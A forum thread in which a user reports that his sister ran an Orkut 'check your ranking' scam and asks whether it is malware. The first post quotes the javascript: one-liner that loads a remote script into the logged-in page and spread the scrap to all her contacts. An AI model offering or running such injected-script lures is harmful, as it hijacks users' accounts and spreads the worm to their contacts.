Orkut malware?

Status
Not open for further replies.

sakumar79

Technomancer
Hi,
My sister has received a scrap on Orkut that reads "ORKUT RANKING..!!

ORKUT has Ranked all our PROFILE... Please check your rank soon , by Just copy and paste the script found below and paste it in your adderss bar, (the place where u see www.orkut.com) and hit ENTER" and then, there is a link to a javascript (DO NOT GO TO THE URL)
Code:
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='*love4mycommunities.googlepages.com/scr.js';void(0)

Unknowingly, she clicked on it... Now, it has sent copies of the scrap to all her contacts... Is there any virus/malware threat in the script? Since I dont use Orkut, I dont know the nature of problem, and googling did not bring up anything... And if there is any virus problem, how to disinfect the affected system...

Thanks in advance,
Arun

sam_1710

Youngling
aaahh.. another javascript problem!! :(
Nope... AFAIK there's no Virus problem at all...
btw.. before trying out anything of that sort (javascripts..etc) jus check out the script file (which is usually embeded in that javascipt) and try to understand wat it does...
For your above script.. the script was uploaded here:*love4mycommunities.googlepages.com/scr.js
"make sure u try to understand the code.."

OFFTOPIC:
bw.. Once one of my friends had written a scrap. Afetr that whenever i trird opened the scrapbook, my account used to logout!! :mad:

OP
S

sakumar79

Technomancer
If I had been there when the deed was done, I would have stopped her... Currently, I have helped her to go through all her friends and go to their scrapbook and deleted the entry...

Arun

Status
Not open for further replies.
Top Bottom